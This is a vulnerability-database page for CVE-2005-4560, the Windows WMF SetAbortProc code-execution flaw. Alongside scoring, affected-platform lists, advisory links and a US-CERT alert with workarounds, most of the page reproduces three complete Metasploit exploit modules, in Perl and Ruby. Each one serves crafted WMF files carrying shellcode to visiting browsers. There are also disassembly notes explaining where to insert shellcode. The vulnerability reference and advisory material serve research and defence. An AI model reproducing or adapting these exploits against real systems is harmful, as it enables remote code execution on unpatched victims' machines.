CVE-2005-4560
CVSS7.5
发布时间 :2005-12-28 14:03:00
修订时间 :2011-09-22 00:00:00
NMCOEPS    

[原文]The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com.


[CNNVD]Microsoft Windows图形渲染引擎WMF格式代码执行漏洞(CNNVD-200512-584)

        Microsoft Windows是微软发布的非常流行的操作系统。
        Microsoft Windows的WMF图形渲染引擎实现上存在远程代码执行漏洞。如果用户受骗访问了恶意的WMF格式文件的话,则在引擎解析该文件时就会在用户系统上以用户权限执行任意代码。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows_2003_server:standard:sp1
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:microsoft:windows_xp::sp2:home
cpe:/o:microsoft:windows_xp::sp2:media_centerMicrosoft windows xp_sp2 media_center
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:microsoft:windows_2003_server:web:sp1
cpe:/o:microsoft:windows_2003_server:r2:sp1
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2003_server:enterprise:sp1
cpe:/o:microsoft:windows_xp::sp1:media_centerMicrosoft windows xp_sp1 media_center

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1612Server 2003 Graphics Rendering Engine Vulnerability
oval:org.mitre.oval:def:1564WinXP,SP1 Graphics Rendering Engine Vulnerability
oval:org.mitre.oval:def:1492WinXP (64-bit) Graphics Rendering Engine Vulnerability
oval:org.mitre.oval:def:1460Server 2003,SP1 Graphics Rendering Engine Vulnerability
oval:org.mitre.oval:def:1433WinXP,SP2 Graphics Rendering Engine Vulnerability
oval:org.mitre.oval:def:1431Win2K Graphics Rendering Engine Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4560
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4560
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-584
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA06-005A.html
(VENDOR_ADVISORY)  CERT  TA06-005A
http://www.us-cert.gov/cas/techalerts/TA05-362A.html
(VENDOR_ADVISORY)  CERT  TA05-362A
http://www.kb.cert.org/vuls/id/181038
(VENDOR_ADVISORY)  CERT-VN  VU#181038
http://www.microsoft.com/technet/security/bulletin/ms06-001.mspx
(PATCH)  MS  MS06-001
http://xforce.iss.net/xforce/xfdb/23846
(UNKNOWN)  XF  win-wmf-execute-code(23846)
http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375420
(UNKNOWN)  MISC  http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375420
http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375341
(UNKNOWN)  MISC  http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375341
http://www.vupen.com/english/advisories/2005/3086
(VENDOR_ADVISORY)  VUPEN  ADV-2005-3086
http://www.securityfocus.com/bid/16074
(UNKNOWN)  BID  16074
http://www.securityfocus.com/archive/1/archive/1/420773/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060104 Another WMF exploit workaround
http://www.securityfocus.com/archive/1/archive/1/420687/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060103 Re: [funsec] WMF round-up, updates and de-mystification
http://www.securityfocus.com/archive/1/archive/1/420684/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060103 WMF SETABORTPROC exploit
http://www.securityfocus.com/archive/1/archive/1/420682/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060103 WMF round-up, updates and de-mystification
http://www.securityfocus.com/archive/1/archive/1/420664/30/7730/threaded
(UNKNOWN)  BUGTRAQ  20060101 Re: RE: WMF Exploit
http://www.securityfocus.com/archive/1/archive/1/420546/30/7730/threaded
(UNKNOWN)  BUGTRAQ  20051229 RE: WMF Exploit
http://www.securityfocus.com/archive/1/archive/1/420446/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051229 WMF exploit
http://www.securityfocus.com/archive/1/archive/1/420378/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051228 WMF Exploit
http://www.securityfocus.com/archive/1/archive/1/420367/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051228 Re: Is this a new exploit?
http://www.securityfocus.com/archive/1/archive/1/420357/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051228 RE: [Full-disclosure] Someone wasted a nice bug on spyware...
http://www.securityfocus.com/archive/1/archive/1/420351/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051227 Exploitation of Windows WMF on the web
http://www.securityfocus.com/archive/1/archive/1/420288/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051227 Is this a new exploit?
http://www.microsoft.com/technet/security/advisory/912840.mspx
(VENDOR_ADVISORY)  MISC  http://www.microsoft.com/technet/security/advisory/912840.mspx
http://www.f-secure.com/weblog/archives/archive-122005.html#00000753
(VENDOR_ADVISORY)  MISC  http://www.f-secure.com/weblog/archives/archive-122005.html#00000753
http://vil.mcafeesecurity.com/vil/content/v_137760.htm
(VENDOR_ADVISORY)  MISC  http://vil.mcafeesecurity.com/vil/content/v_137760.htm
http://support.avaya.com/elmodocs2/security/ASA-2006-001.htm
(VENDOR_ADVISORY)  MISC  http://support.avaya.com/elmodocs2/security/ASA-2006-001.htm
http://securitytracker.com/id?1015416
(UNKNOWN)  SECTRACK  1015416
http://secunia.com/advisories/18415
(VENDOR_ADVISORY)  SECUNIA  18415
http://secunia.com/advisories/18364
(VENDOR_ADVISORY)  SECUNIA  18364
http://secunia.com/advisories/18311
(VENDOR_ADVISORY)  SECUNIA  18311
http://secunia.com/advisories/18255
(VENDOR_ADVISORY)  SECUNIA  18255
http://linuxbox.org/pipermail/funsec/2006-January/002455.html
(UNKNOWN)  MISC  http://linuxbox.org/pipermail/funsec/2006-January/002455.html

- 漏洞信息

Microsoft Windows图形渲染引擎WMF格式代码执行漏洞
高危 输入验证
2005-12-28 00:00:00 2006-06-06 00:00:00
远程  
        Microsoft Windows是微软发布的非常流行的操作系统。
        Microsoft Windows的WMF图形渲染引擎实现上存在远程代码执行漏洞。如果用户受骗访问了恶意的WMF格式文件的话,则在引擎解析该文件时就会在用户系统上以用户权限执行任意代码。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx

- 漏洞信息 (1391)

Windows XP/2003 Metafile Escape() Code Execution Exploit (meta) (EDBID:1391)
windows remote
2005-12-27 Verified
0 H D Moore
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ie_xp_pfv_metafile;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;

my $advanced =
  {
  };

my $info =
  {
	'Name'           => 'Windows XP/2003 Metafile Escape() SetAbortProc Code Execution',
	'Version'        => '$Revision: 1.8 $',
	'Authors'        =>
	  [
		'H D Moore <hdm [at] metasploit.com',
		'san <san [at] xfocus.org>',
		'O600KO78RUS[at]unknown.ru'
	  ],

	'Description'    =>
	  Pex::Text::Freeform(qq{
			This module exploits a vulnerability in the GDI library included with
			Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
			to execute arbitrary code through the SetAbortProc procedure. This module
			generates a random WMF record stream for each request.
}),

	'Arch'           => [ 'x86' ],
	'OS'             => [ 'win32', 'winxp', 'win2003' ],
	'Priv'           => 0,

	'UserOpts'       =>
	  {
		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
	  },

	'Payload'        =>
	  {
		'Space'    => 1000 + int(rand(256)) * 4,
		'BadChars' => "\x00",
		'Keys'     => ['-bind'],
	  },
	'Refs'           =>
	  [
	  	['BID', '16074'],
		['CVE', '2005-4560'],
	  	['OSVDB', '21987'],
		['MIL', '111'],	
		['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
		['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
	  ],

	'DefaultTarget'  => 0,
	'Targets'        =>
	  [
		[ 'Automatic - Windows XP / Windows 2003' ]
	  ],
	
	'Keys'           => [ 'wmf' ],

	'DisclosureDate' => 'Dec 27 2005',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $server = IO::Socket::INET->new(
		LocalHost => $self->GetVar('HTTPHOST'),
		LocalPort => $self->GetVar('HTTPPORT'),
		ReuseAddr => 1,
		Listen    => 1,
		Proto     => 'tcp'
	);
	my $client;

	# Did the listener create fail?
	if (not defined($server)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}
	
	my $httphost = $self->GetVar('HTTPHOST');
	if ($httphost eq '0.0.0.0') {
		$httphost = Pex::Utils::SourceIP('1.2.3.4');
	}

	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

	while (defined($client = $server->accept())) {
		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
	}

	return;
}

sub HandleHttpClient
{
	my $self = shift;
	my $fd   = shift;

	# Set the remote host information
	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
		

	# Read the HTTP command
	my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);

 	
	if ($url !~ /\.wmf/i) {
		$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting...");
		
		# XXX This could be replaced by obfuscated javascript too...
		
		# Transmit the HTTP redirect response
		$fd->Send(
			"HTTP/1.0 302 Moved\r\n" .
			"Location: /". Pex::Text::AlphaNumText(int(rand(1024)+1))  .".wmf\r\n" .
			"Content-Type: text/html\r\n" .
			"Content-Length: 0\r\n" .
			"Connection: close\r\n" .
			"\r\n"
		  );

		$fd->Close();
		
		return;		
	}
	
	my $shellcode = $self->GetVar('EncodedPayload')->Payload;

	# Push our minimum length just over the ethernet MTU
	my $pre_mlen = 1440 + rand(8192);
	my $suf_mlen = rand(8192)+128;
	
	# The number of random objects we generated
	my $fill = 0;
	
	# The buffer of random bogus objects
	my $pre_buff = "";
	my $suf_buff = "";

	while (length($pre_buff) < $pre_mlen && $fill < 65535) {
		$pre_buff .= RandomWMFRecord();
		$fill += 1;
	}

	while (length($suf_buff) < $suf_mlen && $fill < 65535) {
		$suf_buff .= RandomWMFRecord();
		$fill += 1;
	}

	my $clen = 18 + 8 + 6 + length($shellcode) + length($pre_buff) + length($suf_buff);
	my $content =
		#
		# WindowsMetaHeader
		#
		pack('vvvVvVv',
				# WORD  FileType;       /* Type of metafile (0=memory, 1=disk, 2=fjear) */
				2,
				# WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
				9,
				# WORD  Version;        /* Version of Microsoft Windows used */
				0x0300,
				# DWORD FileSize;       /* Total size of the metafile in WORDs */
				$clen/2,
				# WORD  NumOfObjects;   /* Number of objects in the file */
				$fill+1,
				# DWORD MaxRecordSize;  /* The size of largest record in WORDs */
				int(rand(64)+8),
				# WORD  NumOfParams;    /* Not Used (always 0) */
				0
		).
		#
		# Filler data
		#
		$pre_buff.
		#
		# StandardMetaRecord - Escape()
		#
		pack('Vvv',
			# DWORD Size;          /* Total size of the record in WORDs */
			4,
			# WORD  Function;      /* Function number (defined in WINDOWS.H) */
			0x0026,                # Can also be 0xff26, 0x0626, etc...
			# WORD  Parameters[];  /* Parameter values passed to function */
			9,
		). $shellcode .
		#
		# Filler data
		#
		$suf_buff.
		#
		# Complete the structure
		#
		pack('Vv',
			3,
			0
		);

	
	$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");


	# Transmit the HTTP response
	my $req = 		
		"HTTP/1.0 200 OK\r\n" .
		"Content-Type: text/plain\r\n" .
		"Content-Length: " . length($content) . "\r\n" .
		"Connection: close\r\n" .
		"\r\n" .
		$content;
		
		
	my $res = $fd->Send($req);

	# Prevents IE from throwing an error in some cases
	select(undef, undef, undef, 0.1);
	
	$fd->Close();
	
	# The Content-Disposition trick was not very reliable (2003 ignores it)
	#    "Content-Disposition: inline; filename=". Pex::Text::AlphaNumText(int(rand(1024)+1)) .".jpg\r\n".
}


sub RandomWMFRecord {
	my $type = int(rand(3));

	if ($type == 0)	{
		# CreatePenIndirect
		return pack('Vv',
			8,
			0x02FA
		). Pex::Text::RandomData(10)
	}
	elsif ( $type == 1 ) {
		# CreateBrushIndirect
		return pack('Vv',
			7,
			0x02FC
		). Pex::Text::RandomData(8)
	}
	else {
		# Rectangle
		return pack('Vv',
			7,
			0x041B
		). Pex::Text::RandomData(8)
	}
}


1;

__END__

Used with permission by san[at]xfocus.org:
------------------------------------------

The recent wmf vul is really fun, I found some interest things after
analysed it. I attached a very simple wmf file(64 bytes) which can crash
your explorer. You can simply change those 0xcc to your shellcode.

An attach wmf file constructs with a 18 bytes metafile header which
defined as following:

typedef struct _WindowsMetaHeader
{
  WORD  FileType;       /* Type of metafile (0=memory, 1=disk) */
  WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
  WORD  Version;        /* Version of Microsoft Windows used */
  DWORD FileSize;       /* Total size of the metafile in WORDs */
  WORD  NumOfObjects;   /* Number of objects in the file */
  DWORD MaxRecordSize;  /* The size of largest record in WORDs */
  WORD  NumOfParams;    /* Not Used (always 0) */
} WMFHEAD;

and two data records which defined as following:

typedef struct _StandardMetaRecord
{
    DWORD Size;          /* Total size of the record in WORDs */
    WORD  Function;      /* Function number (defined in WINDOWS.H) */
    WORD  Parameters[];  /* Parameter values passed to function */
} WMFRECORD;

Somethings that we need to attention:

1. FileSize of _WindowsMetaHeader is in WORDs, don't forget to divide 2;
2. the attack file is larger than 64 bytes;
3. the last record always has a function number of 0000h, a Size of
00000003h, and no Parameters array;
4. the attack record has a function number of 0626h, which defined in
wingdi.h. 26h is important, it will flow to Escape function. I found
it will lead to SetAbortProc only the Parameters[0] is 0009h.

.text:77C4B65C loc_77C4B65C:                           ; CODE XREF: PlayMetaFileRecord+43j
.text:77C4B65C                                         ; DATA XREF: .text:off_77C769FE+o
.text:77C4B65C                 push    [ebp+uFlags]    ; case 0x26
.text:77C4B65F                 push    ebx
.text:77C4B660                 call    sub_77C4B68A
.text:77C4B665                 cmp     eax, edi
.text:77C4B667                 mov     [ebp+var_4], eax
.text:77C4B66A                 jnz     loc_77C4B424
.text:77C4B670                 mov     ax, [ebx+6]
.text:77C4B674                 cmp     ax, 0Fh
.text:77C4B678                 jnz     loc_77C5FC0A    ; flow to Escape
...
.text:77C61062 loc_77C61062:                           ; CODE XREF: Escape+ECB7j
.text:77C61062                 sub     edi, 6
.text:77C61065                 jz      short loc_77C61090 ; it flow to SetAbortProc only the Parameters[0] is 0009h
...
.text:77C543E7 loc_77C543E7:                           ; CODE XREF: SetAbortProc+54j
.text:77C543E7                                         ; SetAbortProc+10720tj
.text:77C543E7                 xor     eax, eax
.text:77C543E9                 mov     [esi+14h], edi  ; write callback pointer?
...
.text:77C604C8 owned:                                  ; CODE XREF: sub_77C4B09C+1E4j
.text:77C604C8                 mov     eax, [eax+14h]  ; the pointer
.text:77C604CB                 cmp     eax, ecx
.text:77C604CD                 jz      loc_77C4B286
.text:77C604D3                 push    ecx
.text:77C604D4                 push    edi
.text:77C604D5                 call    eax             ; got it

Best Regards
--
san <san[at]xfocus.org>

# milw0rm.com [2005-12-27]
		

- 漏洞信息 (16612)

Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution (EDBID:16612)
windows remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms06_001_wmf_setabortproc.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	#
	# This module acts as an HTTP server
	#
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
			'Description'    => %q{
					This module exploits a vulnerability in the GDI library included with
				Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
				to execute arbitrary code through the SetAbortProc procedure. This module
				generates a random WMF record stream for each request.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'hdm',
					'san <san@xfocus.org>',
					'O600KO78RUS@unknown.ru',
				],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2005-4560'],
					['OSVDB', '21987'],
					['MSB', 'MS06-001'],
					['BID', '16074'],
					['URL', 'http://www.microsoft.com/technet/security/advisory/912840.mspx'],
					['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
					['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 1000 + (rand(256).to_i * 4),
					'BadChars' => "\x00",
					'Compat'   =>
						{
							'ConnectionType' => '-find',
						},
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP/2003/Vista Automatic', { }],
				],
			'DisclosureDate' => 'Dec 27 2005',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)

		ext = 'wmf'

		if (not request.uri.match(/\.wmf$/i))
			if ("/" == get_resource[-1,1])
				wmf_uri = get_resource[0, get_resource.length - 1]
			else
				wmf_uri = get_resource
			end
			wmf_uri << "/" + rand_text_alphanumeric(rand(80)+16) + "." + ext

			html = "<html><meta http-equiv='refresh' content='0; " +
				"URL=#{wmf_uri}'><body>One second please...</body></html>"
			send_response_html(cli, html)
			return
		end

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the compressed response to the client
		send_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' })

		# Handle the payload
		handler(cli)
	end

	def generate_metafile(payload)

		# Minimal length values before and after the Escape record
		pre_mlen = 1440 + rand(8192)
		suf_mlen = 128  + rand(8192)

		# Track the number of generated records
		fill = 0

		# The prefix and suffix buffers
		pre_buff = ''
		suf_buff = ''

		# Generate the prefix
		while (pre_buff.length < pre_mlen)
			pre_buff << generate_record()
			fill += 1
		end

		# Generate the suffix
		while (suf_buff.length < suf_mlen)
			suf_buff << generate_record()
			fill += 1
		end

		clen = 18 + 8 + 6 + payload.encoded.length + pre_buff.length + suf_buff.length
		data =
			#
			# WindowsMetaHeader
			#
			[
				# WORD  FileType;       /* Type of metafile (1=memory, 2=disk) */
				rand(2)+1,
				# WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
				9,
				# WORD  Version;        /* Version of Microsoft Windows used */
				( rand(2).to_i == 1 ? 0x0300 : 0x0100 ),
				# DWORD FileSize;       /* Total size of the metafile in WORDs */
				clen/2,
				# WORD  NumOfObjects;   /* Number of objects in the file */
				rand(0xffff),
				# DWORD MaxRecordSize;  /* The size of largest record in WORDs */
				rand(0xffffffff),
				# WORD  NumOfParams;    /* Not Used (always 0) */
				rand(0xffff),
			].pack('vvvVvVv') +
			#
			# Filler data
			#
			pre_buff +
			#
			# StandardMetaRecord - Escape()
			#
			[
				# DWORD Size;          /* Total size of the record in WORDs */
				4,
				# WORD  Function;      /* Function number (defined in WINDOWS.H) */
				(rand(256).to_i << 8) + 0x26,
				# WORD  Parameters[];  /* Parameter values passed to function */
				9,
			].pack('Vvv') + payload.encoded +
			#
			# Filler data
			#
			suf_buff +
			#
			# Complete the stream
			#
			[3, 0].pack('Vv') +
			#
			# Some extra fun padding
			#
			rand_text(rand(16384)+1024)

		return data

	end

	def generate_record
		type = rand(3)

		case type
			when 0
				# CreatePenIndirect
				return [8, 0x02fa].pack('Vv') + rand_text(10)
			when 1
				# CreateBrushIndirect
				return [7, 0x02fc].pack('Vv') + rand_text(8)
			else
				# Rectangle
				return [7, 0x041b].pack('Vv') + rand_text(8)
		end
	end

end
		

- 漏洞信息 (F82985)

Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution (PacketStormID:F82985)
2009-11-26 00:00:00
H D Moore,san,O600KO78RUS  metasploit.com
exploit,arbitrary
windows,xp
CVE-2005-4560
[点击下载]

This Metasploit module exploits a vulnerability in the GDI library included with Windows XP and 2003. This vulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProc procedure. This Metasploit module generates a random WMF record stream for each request.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	#
	# This module acts as an HTTP server
	#
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
			'Description'    => %q{
				This module exploits a vulnerability in the GDI library included with
				Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
				to execute arbitrary code through the SetAbortProc procedure. This module
				generates a random WMF record stream for each request.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'hdm', 
					'san <san@xfocus.org>',
					'O600KO78RUS@unknown.ru',
				],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2005-4560'],
	  				['OSVDB', '21987'],
					['MSB', 'MS06-001'],
	  				['BID', '16074'],
					['URL', 'http://www.microsoft.com/technet/security/advisory/912840.mspx'],					
					['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
					['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 1000 + (rand(256).to_i * 4),
					'BadChars' => "\x00",
					'Compat'   => 
						{
							'ConnectionType' => '-find',
						},
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP/2003/Vista Automatic', { }],
				],
			'DisclosureDate' => 'Dec 27 2005',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
	
	
		ext = 'wmf'
	
		if (not request.uri.match(/\.wmf$/i))
			html =
				"<html><meta http-equiv='refresh' content='0; URL=" +
				get_resource + '/' + 
				rand_text_alphanumeric(rand(80)+16) + 
				".#{ext}'><body>One second please...</body></html>"
			send_response_html(cli, html)
			return
		end

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the compressed response to the client
		send_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' })
		
		# Handle the payload
		handler(cli)
	end
	
	def generate_metafile(payload)
		
		# Minimal length values before and after the Escape record
		pre_mlen = 1440 + rand(8192)
		suf_mlen = 128  + rand(8192)
		
		# Track the number of generated records
		fill = 0
		
		# The prefix and suffix buffers
		pre_buff = ''
		suf_buff = ''
		
		# Generate the prefix
		while (pre_buff.length < pre_mlen) 
			pre_buff << generate_record()
			fill += 1
		end
		
		# Generate the suffix
		while (suf_buff.length < suf_mlen) 
			suf_buff << generate_record()
			fill += 1
		end
		
		clen = 18 + 8 + 6 + payload.encoded.length + pre_buff.length + suf_buff.length
		data =
			#
			# WindowsMetaHeader
			#
			[
				# WORD  FileType;       /* Type of metafile (1=memory, 2=disk) */
				rand(2)+1,
				# WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
				9,
				# WORD  Version;        /* Version of Microsoft Windows used */
				( rand(2).to_i == 1 ? 0x0300 : 0x0100 ),
				# DWORD FileSize;       /* Total size of the metafile in WORDs */
				clen/2,
				# WORD  NumOfObjects;   /* Number of objects in the file */
				rand(0xffff),
				# DWORD MaxRecordSize;  /* The size of largest record in WORDs */
				rand(0xffffffff),
				# WORD  NumOfParams;    /* Not Used (always 0) */
				rand(0xffff),
			].pack('vvvVvVv') +
			#
			# Filler data
			#
			pre_buff +
			#
			# StandardMetaRecord - Escape()
			#
			[
				# DWORD Size;          /* Total size of the record in WORDs */
				4,
				# WORD  Function;      /* Function number (defined in WINDOWS.H) */
				(rand(256).to_i << 8) + 0x26,
				# WORD  Parameters[];  /* Parameter values passed to function */
				9,			
			].pack('Vvv') + payload.encoded +
			#
			# Filler data
			#
			suf_buff +
			#
			# Complete the stream
			#
			[3, 0].pack('Vv') +
			#
			# Some extra fun padding
			#
			rand_text(rand(16384)+1024)
		
		return data
		
	end
	
	def generate_record
		type = rand(3)
		
		case type
			when 0
				# CreatePenIndirect
				return [8, 0x02fa].pack('Vv') + rand_text(10)
			when 1
				# CreateBrushIndirect
				return [7, 0x02fc].pack('Vv') + rand_text(8)			
			else
				# Rectangle
				return [7, 0x041b].pack('Vv') + rand_text(8)
		end
	end


end
    

- 漏洞信息 (F42701)

Technical Cyber Security Alert 2005-362A (PacketStormID:F42701)
2005-12-31 00:00:00
US-CERT  us-cert.gov
advisory,remote,code execution
windows,xp
CVE-2005-4560
[点击下载]

Technical Cyber Security Alert TA05-362A - Microsoft Windows is vulnerable to remote code execution via an error in handling files using the Windows Metafile image format. Exploit code has been publicly posted and used to successfully attack fully-patched Windows XP SP2 systems. However, other versions of the the Windows operating system may be at risk as well.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Microsoft Windows Metafile Handling Buffer Overflow

   Original release date: December 28, 2005
   Last revised: --
   Source: US-CERT

Systems Affected

     * Systems running Microsoft Windows

Overview

   Microsoft Windows is vulnerable to remote code execution via an error
   in handling files using the Windows Metafile image format. Exploit
   code has been publicly posted and used to successfully attack
   fully-patched Windows XP SP2 systems. However, other versions of the
   the Windows operating system may be at risk as well.

I. Description

   Microsoft Windows Metafiles are image files that can contain both
   vector and bitmap-based picture information. Microsoft Windows
   contains routines for displaying various Windows Metafile formats.
   However, a lack of input validation in one of these routines may allow
   a buffer overflow to occur, and in turn may allow remote arbitrary
   code execution.

   This new vulnerability may be similar to one Microsoft released
   patches for in Microsoft Security Bulletin MS05-053. However, publicly
   available exploit code is known to affect systems updated with the
   MS05-053 patches.

   Not all anti-virus software products are currently able to detect all
   known variants of exploits for this vulnerability. However, US-CERT
   recommends updating anti-virus signatures as frequently as practical
   to provide maximum protection as new variants appear.

   US-CERT is tracking this issue as VU#181038. This reference number
   corresponds to CVE entry CVE-2005-4560.

II. Impact

   A remote, unauthenticated attacker may be able to execute arbitrary
   code if the user is persuaded to view a specially crafted Windows
   Metafile.

III. Solution

   Since there is no known patch for this issue at this time, US-CERT is
   recommending sites follow several potential workarounds.

Workarounds

   Please be aware US-CERT has confirmed that filtering based just on the
   WMF file extension or MIME type "application/x-msmetafile" will not
   block all known attack vectors for this vulnerability. Filter
   mechanisms should be looking for any file that Microsoft Windows
   recognizes as a Windows Metafile by virtue of its file header.

Do not access Windows Metafiles from untrusted sources

   Exploitation occurs by accessing a specially crafted Windows Metafile.
   By only accessing Windows Metafiles from trusted or known sources, the
   chances of exploitation are reduced.

   Attackers may host malicious Windows Metafiles on a web site. In order
   to convince users to visit their sites, those attackers often use URL
   encoding, IP address variations, long URLs, intentional misspellings,
   and other techniques to create misleading links. Do not click on
   unsolicited links received in email, instant messages, web forums, or
   internet relay chat (IRC) channels. Type URLs directly into the
   browser to avoid these misleading links. While these are generally
   good security practices, following these behaviors will not prevent
   exploitation of this vulnerability in all cases, particularly if a
   trusted site has been compromised or allows cross-site scripting.

Block access to Windows Metafiles at network perimeters

   By blocking access to Windows Metafiles using HTTP proxies, mail
   gateways, and other network filter technologies, system administrators
   may also limit other potential attack vectors.

Reset the program association for Windows Metafiles

   Remapping handling of Windows Metafiles to open a program other than
   the default Windows Picture and Fax Viewer (SHIMGVW.DLL) may prevent
   exploitation via some current attack vectors. However, this may still
   allow the underlying vulnerability to be exploited via other known
   attack vectors.
